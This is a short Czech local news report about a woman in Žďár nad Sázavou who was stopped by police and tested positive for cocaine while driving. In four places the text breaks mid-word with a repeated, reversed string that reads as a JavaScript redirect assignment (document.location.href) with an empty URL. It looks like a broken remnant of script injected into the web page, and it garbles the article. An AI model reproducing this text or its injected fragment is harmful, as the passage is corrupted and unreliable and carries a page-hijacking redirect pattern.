Rainbow page separator

Test ženy za volantem osobního auta byl pozitivní na kokain

Středa, 28. dubna 2021

Žďár nad Sázavou / Řidičku, která usedla za volant osobního au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu pod vlivem drog, zastavili v ulicích Žďáru tamní policisté. K události došlo v ulici Husova ve středu 21. dubna kolem půl čtvrté odpoledne.
„Řidičkou au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu byla čtyřiačtyřicetiletá žena. Součástí silniční kontroly byl také test na zjištění ovlivnění omamnými a psychotropními látkami. Jeho výsledek byl pozitivní a vykázal pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost kokainu,“ informovala policejní mluvčí Stanislava Rázlová.
Policisté následně řidičku vyzvali k podrobení se lékařskému vyšetření spojenému s odběrem biologického materiálu, s čímž souhlasila. „V další jízdě již pokračovat nesměla. Policisté případ zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali jako přestupek na úseku dopravy,“ doplnila policejní mluvčí.